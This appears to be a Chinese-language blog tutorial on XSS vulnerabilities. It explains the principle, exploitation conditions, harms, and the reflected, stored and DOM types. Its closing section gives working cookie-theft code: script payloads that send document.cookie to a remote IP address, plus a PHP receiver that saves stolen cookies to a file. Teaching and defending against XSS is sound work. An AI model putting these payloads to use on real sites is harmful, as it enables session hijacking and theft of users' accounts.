xss 漏洞的介绍:
原理 sql 注入的本质是什么?就是把用户输入的数据不是正常的数据而是sql代码,然后被执行,Xss漏洞 的原理其实就是前端写的有毛病,你能够自定义的去嵌入js代码让他去执行,讲的再明白一点就是,服务 端把用户输入的数据当成前端代码去执行了
利用条件:
- 用户输入的数据可控
- 原本程序要执行的代码,拼接了用户输入的数据
危害 :
- 盗取用户cookie(用的最多)
- 修改网页内容
- 网站挂马
- Xss蠕虫
分类:
- 反射型xss: 反射型 XSS 又称之为非持久型 XSS,黑客需要通过诱使用户点击包含 XSS 攻击代码的恶意链接, 然,后用户浏览器执行恶意代码触发 XSS 漏洞。
- 存储型xss: 存储型xss会把用户输入的数据存储在服务器端,这种xss可以持久化,而且更加的稳定比如黑客写 了一篇包含xss恶意代码的博客文章,那么访问该博客的所有用户他们的浏览器中都会执行黑客构造的xss 恶意代码,通常这种攻击代码会以文本或数据库的方式保存在服务器端,所以称为存储型xss
- dom型xss: 我们可以通过js代码去操纵所有的dom节点,那么dom型xss可以在前端通过js来完成数据的交 互,达到插入数据造成xss脚本攻击,直接通过修改页面的dom节点形成xss,且不经过服务器, 所以即使抓包无法抓取到这里的流量,而反射型与存储型xss需要与服务器交互,dom型xss也是 一种反射型的xss
Cookie 的获取及利用:
<script>document.write('<img src="http://111.229.218.169/cookie.php?cookie='+document.cookie+'">');</script>
这 段代码的目的就是将当前用户浏览器中的 cookie 值发送到远程服务器 http://111.229.218.169/cookie.php Cookie.php 里写着
<?php $cookie=$_GET['cookie']; file_put_contents('cookie.txt',$cookie); ?> <script>location.href="http://111.229.218.169/cookie.php?cookie="+document.cookie</script>
chown www-data. cookie.txt 给 cookie.txt 写入的权限
标签:xss,dom,代码,用户,漏洞,cookie,XSS From: https://www.cnblogs.com/lovexiaoxingxing/p/18179335